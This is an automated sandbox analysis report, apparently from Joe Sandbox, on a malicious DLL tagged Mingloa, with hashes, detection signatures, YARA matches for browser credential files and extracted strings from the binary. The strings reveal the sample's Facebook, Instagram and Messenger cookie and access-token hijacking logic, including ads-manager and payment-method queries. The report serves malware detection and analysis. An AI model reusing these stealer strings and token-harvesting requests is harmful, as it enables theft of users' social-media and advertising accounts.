

Analysis Report A8xYhQFvXo

Overview

General Information

Sample Name: A8xYhQFvXo (renamed file extension from none to dll)
Analysis ID: 346331
MD5: 83dd317c95f4acb8623d1f024945cfdb
SHA1: 04f9227cc3bfde5626be669be106a5d38f4416b1
SHA256: 5b2f060f1512100a0d500312fa579cdad9d3ea101778838173aa7215cd39700a
Tags: Mingloa


Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
One or more processes crash
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6628 cmdline: loaddll32.exe 'C:\Users\user\Desktop\A8xYhQFvXo.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • rundll32.exe (PID: 6652 cmdline: rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6896 cmdline: rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6972 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 712 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7004 cmdline: rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 712 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
A8xYhQFvXo.dll | APT34_PICKPOCKET | unknown | unknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.236067014.000000001028B000.00000008.00020000.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x1556d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000007.00000002.245505715.000000001028B000.00000008.00020000.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x1556d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x1556d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.rundll32.exe.10000000.1.unpack | APT34_PICKPOCKET | unknown | unknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data
4.2.rundll32.exe.10000000.1.unpack | APT34_PICKPOCKET | unknown | unknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data
7.2.rundll32.exe.10000000.1.unpack | APT34_PICKPOCKET | unknown | unknown
  • 0x200c9c:$s2: \nss3.dll
  • 0x249d10:$s2: \nss3.dll
  • 0x3fc4f0:$s4: | %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  • 0x1d0d44:$s5: \Login Data
  • 0x1d0e34:$s5: \Login Data
  • 0x1d0f24:$s5: \Login Data
  • 0x1d1064:$s5: \Login Data
  • 0x1d1274:$s5: \Login Data
  • 0x1d12f4:$s5: \Login Data
  • 0x1d1374:$s5: \Login Data
  • 0x1d1438:$s5: \Login Data
  • 0x1d1634:$s5: \Login Data
  • 0x1d1744:$s5: \Login Data
  • 0x1d18d4:$s5: \Login Data
  • 0x1d1944:$s5: \Login Data
  • 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini
  • 0x1d0d45:$s7: Login Data
  • 0x1d0e35:$s7: Login Data
  • 0x1d0f25:$s7: Login Data
  • 0x1d1065:$s7: Login Data

Sigma Overview

No Sigma rule has matched

Signature Overview



AV Detection:

Multi AV Scanner detection for submitted file
Source: A8xYhQFvXo.dll | Virustotal: Detection: 17%
Source: A8xYhQFvXo.dll | Metadefender: Detection: 18%
Source: A8xYhQFvXo.dll | ReversingLabs: Detection: 44%
Machine Learning detection for sample
Source: A8xYhQFvXo.dll | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: A8xYhQFvXo.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Binary contains paths to debug symbols
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10147900 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,1_2_10147900
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10145A40 FindFirstFileA,FindClose,1_2_10145A40
Source: A8xYhQFvXo.dllString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: A8xYhQFvXo.dll | String found in binary or memory: https://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: A8xYhQFvXo.dllString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://ocsp.digicert.com0I
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://ocsp.digicert.com0P
